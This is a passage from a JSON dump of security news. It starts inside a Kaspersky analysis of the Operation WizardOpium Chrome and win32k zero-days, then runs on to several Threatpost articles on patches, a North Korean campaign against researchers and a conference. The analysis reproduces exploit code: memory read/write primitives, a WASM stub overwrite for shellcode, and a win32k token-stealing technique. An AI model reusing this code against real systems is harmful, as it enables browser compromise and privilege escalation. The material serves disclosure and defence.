a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) &amp; 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-13T05:41:44", "bulletinFamily": "info", "cvelist": ["CVE-2020-1643", "CVE-2020-1668", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1673", "CVE-2021-1705"], "description": "Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its [January Patch Tuesday roundup of fixes](<https://msrc.microsoft.com/update-guide>). In total it patched 83 vulnerabilities.\n\nThe most serious bug is a flaw in Microsoft\u2019s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users who have not connected to internet recently and received an auto-update, should patch now.\n\n\u201cThis bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you\u2019ll need to manually apply the patch,\u201d wrote Dustin Childs, Trend Micro\u2019s Zero Day Initiative (ZDI) security manager. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers believe the vulnerability, [tracked as CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), has been exploited for the past three months and was leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>). Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.\n\nAffected versions of Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and 2004 Windows Server, [according t](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)o the security bulletin.\n\n## **Publicly Known Bug Fixed Twice **\n\nMicrosoft patched a second vulnerability, that researchers believe was also being exploited in the wild, tracked as [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>). The flaw is classified as an elevation-of-privilege bug and impacts the Windows [print driver process SPLWOW64.exe](<https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p>).\n\nThe bug first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI re-discovered the flaw a second time, which Microsoft is patched again Tuesday.\n\n\u201cThe previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,\u201d Childs wrote in a prepared [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review>).\n\n## **Additional Critical Bugs **\n\nEight additional bugs rated critical were also part of Microsoft\u2019s Tuesday vulnerability fixes.\n\nThese included a remote code-execution bug in Microsoft\u2019s Edge web browser. The vulnerability (CVE-2021-1705) is memory-related and tied to a the way the browser improperly access objects in memory.\n\n\u201cSuccessful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. \u201cIf the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.\u201d\n\nAdditional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).\n\nFive January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevation of privileges, run a specially crafted application and take complete control of the targeted system.\n\n\u201cWith the SolarWinds breach still fresh from December and the scope of impact growing by the day, there\u2019s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,\u201d Knapp wrote. \u201cWhether it\u2019s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m. ET._\n", "modified": "2021-01-12T21:45:23", "published": "2021-01-12T21:45:23", "id": "THREATPOST:B879E243998561911585BBD37B7F33E9", "href": "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "type": "threatpost", "title": "Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-26T16:35:34", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Hackers linked to [North Korea](<https://threatpost.com/north-korea-spy-reporters-feds-warn/160622/>) are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them \u2014 and then infects their organizations\u2019 systems with custom backdoor malware.\n\nThat\u2019s according to [Google\u2019s Threat Analysis Group (TAG),](<https://twitter.com/ShaneHuntley/status/1353856344655204352>) which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.\n\nThe effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a [blog post](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) by TAG\u2019s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims\u2019 machines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. And moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions \u2014 a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.\n\nTAG attributed the threat actors to \u201ca government-backed entity based in North Korea.\u201d\n\n\u201cThey\u2019ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,\u201d according to the post. \u201cTheir blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u2018guest\u2019 posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.\u201d\n\nIn addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, [Discord](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>), Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.\n\n## **Making Connections**\n\nAttackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they\u2019ve worked on, including faking the success of a working exploit for an existing and recently patched [Windows Defender vulnerability](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>), [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), on YouTube.\n\nThe vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>).\n\n\u201cIn the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,\u201d Weidermann explained.\n\nIf an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets [took to Twitter](<https://twitter.com/search?q=blog.br0vvnn.io&src=typed_query>) to describe their experiences.\n\n> I got targeted by Zhang Guo and sent me the blog post link hxxps://blog.br0vvnn[.]io/pages/blogpost.aspx?id=1&amp;q=1 <https://t.co/QR5rUYDHrh>\n> \n> \u2014 lockedbyte (@lockedbyte) [January 26, 2021](<https://twitter.com/lockedbyte/status/1353995532180615174?ref_src=twsrc%5Etfw>)\n\n\u201cWithin the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,\u201d Weidermann wrote. \u201cThe DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.\u201d\n\nVictims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor\u2019s blog, according to TAG. Accessing the link installs a malicious service on the researcher\u2019s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.\n\nThe TAG team so far could not confirm the mechanism of compromise, asking for help from the greater security community to identify and submit information through the [Chrome Vulnerability Reward Program](<https://www.google.com/about/appsecurity/chrome-rewards/>).\n\nResearchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.\n\nWeidermann\u2019s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.\n\n\u201cWe hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,\u201d Weidermann wrote.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-26T14:49:03", "published": "2021-01-26T14:49:03", "id": "THREATPOST:FF67AF009F2F0031599099334F6CC306", "href": "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "type": "threatpost", "title": "North Korea Targets Security Researchers in Elaborate 0-Day Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1491"], "description": "UPDATE\n\nMicrosoft has added a fresh CVE to its security portal, linking it to the existing November security updates (the patch itself was already included in the updates, but not specifically named). The CVE describes a vulnerability in SharePoint Server.\n\nAccording to a Microsoft Security Advisory, an attacker could exploit the bug (CVE-2019-1491) to obtain sensitive information and then use that information to mount further attacks.\n\n\u201cAn information disclosure vulnerability exists in SharePoint Server. An attacker who exploited this vulnerability could read arbitrary files on the server,\u201d according to [the advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1491>), published on Tuesday. \u201cTo exploit the vulnerability, an attacker would need to send a specially crafted request to a susceptible SharePoint Server instance.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe reading pane is not an attack vector, the computing giant added.\n\nThe patch addresses the important-severity vulnerability by changing how affected APIs process requests. Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 SP2 and 2013 SP1 and Microsoft SharePoint Server 2019 are impacted; Saif ElSherei of Microsoft Research Center\u2019s Vulnerabilities and Mitigations Team is credited with discovering the bug.\n\nThe CVE has been added to the computing giant\u2019s existing stash of Patch Tuesday security updates.\n\n[December\u2019s Patch Tuesday](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) was relatively light, and it delivered just 37 CVEs (including the new one) across a range of products. The scheduled security update this month in all now includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business; it addressed seven bugs that are rated critical, 29 that are rated important (including the new bug), and one rated moderate in severity.\n\nOne of the updates is a fix for a bug that was first seen being exploited in the wild as a zero-day. [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k; the exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n**_This post was updated at 10:50 a.m. ET on Dec. 19 to correct the statement that this was an \u201cout-of-band\u201d security patch. CISA/US-CERT mistakenly issued an alert using that language, leading to confusion on the part of this reporter and many others. We apologize for the error. _**\n", "modified": "2019-12-18T19:14:55", "published": "2019-12-18T19:14:55", "id": "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "href": "https://threatpost.com/microsoft-issues-out-of-band-update-sharepoint-bug/151260/", "type": "threatpost", "title": "Microsoft Issues Out-of-Band Update for SharePoint Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, 